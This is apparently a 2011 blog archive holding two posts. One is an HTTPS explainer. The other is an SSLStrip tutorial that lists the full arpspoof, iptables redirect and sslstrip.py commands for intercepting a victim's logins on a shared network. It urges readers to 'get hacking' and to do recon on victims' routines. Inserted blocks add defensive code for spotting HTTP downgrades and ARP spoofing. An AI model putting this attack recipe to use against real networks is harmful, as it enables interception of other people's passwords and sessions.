Archive for August, 2011


Say you want to use the Internet to do e-commerce, such as buying something from Amazon.  In order to do this, you need to send your credit card number and other sensitive information across the Internet.  Over a normal HTTP connection, this data can be easily intercepted by an attacker sitting between you and the server.  This kind of attack is known as a Man-In-The-Middle attack.  There are many things people do on the Internet for which some form of encryption should be used to protect them.  The current solution to this problem is to encrypt the data before sending it, in such a way that only the intended recipient will be able to decrypt it.  It’s called HTTPS (the ‘s’ stands for secure) and you’ve probably used it without even knowing it.

What I’d like to teach you is how to determine whether your connection is HTTP or HTTPS.  When you are using HTTPS, you can be sure that your personal information will safely and securely reach its destination*.

The difference is in the URL that you type into your web browser.  HTTP links are prefixed with “http://”, like the following example:

http://mail.google.com

On the other hand, HTTPS links are prefixed with “https://”, like the following example:

https://mail.google.com

Luckily, sites which want to ensure their users connect securely can redirect you to HTTPS if you try to access them over HTTP.  Some sites, like Gmail in the example above, force secure communication.  This means that if you manually type in http://mail.google.com and your browser fails to follow the redirect, Gmail will refuse your connection.
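A small added example (not from the original post) of checking how a site answers a plain http:// request, using two constructed responses: a redirect to an https:// URL means the site forces HTTPS, while a 200 with page content means it is willing to serve the page over plain HTTP. The parser and the http_policy function are my own names, not part of any browser or tool:

```python
from urllib.parse import urlsplit

# Constructed raw responses to a plain "GET / HTTP/1.1" sent over http://.
# The first is what a site that forces HTTPS returns; the second is what a
# site that is happy to serve its login form over plain HTTP returns.
REDIRECT_RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Location: https://mail.google.com/\r\n"
    "Content-Length: 0\r\n\r\n")
PLAIN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n\r\n<html>login form here</html>")

def parse_response(raw):
    """Split a raw HTTP response into (status code, lower-cased header dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    code = int(status_line.split()[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return code, headers

def http_policy(raw):
    """Classify how a site answered an http:// request:
    'forces-https' (redirect to an https:// URL), 'plain-http' (served the
    page in the clear) or 'other' (anything else, e.g. an error page)."""
    code, headers = parse_response(raw)
    if code in (301, 302, 307, 308):
        if urlsplit(headers.get("location", "")).scheme == "https":
            return "forces-https"
        return "other"
    if code == 200:
        return "plain-http"
    return "other"
```

A site you know normally answers “forces-https” but that suddenly serves “plain-http” from the network you are on deserves a second look before you type a password.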

An easy way to tell whether the site you’re currently viewing is using HTTPS is to click the lock icon on the left of the URL bar:

If you click on “Certificate Information”, you can find out more about the certificate the website is using.

* This is not entirely true.  HTTPS traffic can be sniffed and decrypted by certain entities.  Many governments have the ability to intercept HTTPS traffic.  Also, there have been several recent breaches of so-called “Certificate Authorities”, which have led to a handful of rogue, counterfeit certificates.  There are also tactics which one can use on a local area network to steal HTTPS traffic.  However, these methods are much less practical and much less prevalent.  The fundamental difference comes down to HTTP traffic travelling across the Internet in plaintext, whereas HTTPS traffic is encrypted and only readable by the intended receiver.

SSLStrip is a tool for executing Man-In-The-Middle attacks.  It allows you to steal HTTPS/SSL traffic, including usernames and passwords.  The only information you need to know about your victim in order to attack is their internal IP address and the gateway address of the network you are on (which means you need to be on the same network as the victim to do this; a tutorial on hijacking wifi passwords is coming soon).

I will be using BackTrack Linux as the attacker and Windows XP as the victim.  Both are virtual machines.

First, run ifconfig and take note of which network interface you are currently using.  In the screenshot below (figure 1.1), my network interface is eth2.

Now let’s make sure that IP forwarding is enabled (you need to be root):

echo 1 > /proc/sys/net/ipv4/ip_forward

and now verify that it worked:

cat /proc/sys/net/ipv4/ip_forward

should return 1.

Next, run arpspoof.  As the name suggests, it is an ARP spoofing tool.  Use “-i <network interface>”, followed by “-t <target>” (your victim’s internal IP), and finally specify the Internet gateway.  You will see ARP traffic start to stream in the terminal window, as shown below (figure 1.2).

arpspoof -i eth2 -t 192.168.194.130 192.168.194.2

Now, in a new terminal window (don’t close arpspoof!) issue an iptables command.  iptables is the Linux tool for configuring IPv4 packet filtering and NAT rules; this rule redirects incoming TCP port 80 traffic to local port 10000, which is the port SSLStrip listens on by default.  I won’t go into any more detail for now.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

And finally, run SSLStrip.  We will use “-w <output file>” to specify somewhere to dump the data we are redirecting.

python sslstrip.py -w output.dmp

Everything is now set up, and any HTTPS/SSL web browsing that the victim does will be dumped to the output file we specified when we started sslstrip.py.  That’s about all you need to know! Now go out there and get hacking!

Here’s some sample output from SSLStrip; notice the username and password in plaintext at the end of the string.

Now, on the victim, I went to gmail.com before executing sslstrip.  Once I started it, I signed in.  Very few people would notice this, or be wary if they noticed it, but traffic will now appear to the victim as HTTP.  SSLStrip re-encrypts the packets before sending them on to the gateway, since servers like Gmail and PayPal don’t allow plain HTTP.

Here’s a visual representation of before and during an attack.

Illustrated in the picture below is one sign that you are being MITM’d.  While connecting to Gmail, your browser will show that you are using HTTP.  It attempted HTTPS/SSL but was unable to make the connection, so insecure HTTP is forced.  Only a conscious and educated victim will identify this as suspicious, and of those people only the bored will care to investigate it.

Another way to tell that you are being MITM’d is that the entry for the gateway in your ARP table will change to the attacker’s hardware (MAC) address.  Here’s a screenshot of the “arp -a” command being issued on the victim before and then during the attack.
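Added example, not from the original post: a defender-side check that parses two “arp -a” snapshots (before and during) and reports the two signatures of ARP spoofing, the gateway’s MAC changing and one MAC being claimed by several IPs. The sample tables are constructed; the victim and gateway addresses match the post, while the attacker address (.128) and all MAC addresses are made up. It goes a little beyond the post by also accepting Linux-style “arp -a” lines.

```python
import re

# Constructed sample "arp -a" output (Windows XP format) from the victim before
# and during an ARP spoofing attack. Victim (.130) and gateway (.2) addresses
# come from the post; the attacker address (.128) and all MACs are made up.
ARP_BEFORE = """\
Interface: 192.168.194.130 --- 0x2
  Internet Address      Physical Address      Type
  192.168.194.2         00-50-56-aa-bb-cc     dynamic
  192.168.194.128       00-0c-29-11-22-33     dynamic
"""
ARP_DURING = """\
Interface: 192.168.194.130 --- 0x2
  Internet Address      Physical Address      Type
  192.168.194.2         00-0c-29-11-22-33     dynamic
  192.168.194.128       00-0c-29-11-22-33     dynamic
"""

# Matches both Windows ("192.168.194.2   00-50-56-aa-bb-cc   dynamic") and
# Linux ("? (192.168.194.2) at 00:50:56:aa:bb:cc [ether] on eth2") entries.
ENTRY = re.compile(
    r"^\s*(?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?\s+(?:at\s+)?"
    r"([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})", re.I)

def parse_arp(text):
    """Map IPv4 address -> MAC (lower-case, colon-separated) from 'arp -a' output."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table

def check_arp(before, during, gateway):
    """Compare two ARP snapshots; return warnings that suggest ARP spoofing."""
    old, new = parse_arp(before), parse_arp(during)
    warnings = []
    # Sign 1 (the one in the post): the gateway's MAC is no longer what it was.
    if gateway in old and gateway in new and old[gateway] != new[gateway]:
        warnings.append(f"gateway {gateway} MAC changed {old[gateway]} -> {new[gateway]}")
    # Sign 2: two IP addresses now resolve to the same MAC (the attacker's).
    by_mac = {}
    for ip, mac in new.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            warnings.append(f"MAC {mac} claimed by {', '.join(sorted(ips))}")
    return warnings
```

Calling check_arp(ARP_BEFORE, ARP_DURING, "192.168.194.2") returns both warnings for the constructed snapshots; an empty list means the two snapshots agree.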

One of the arts of SSLStrip attacks is the social engineering aspect.  You must gather recon on a potential victim and try to discern when they might be using their computer and on which networks they will be.

Thanks for reading!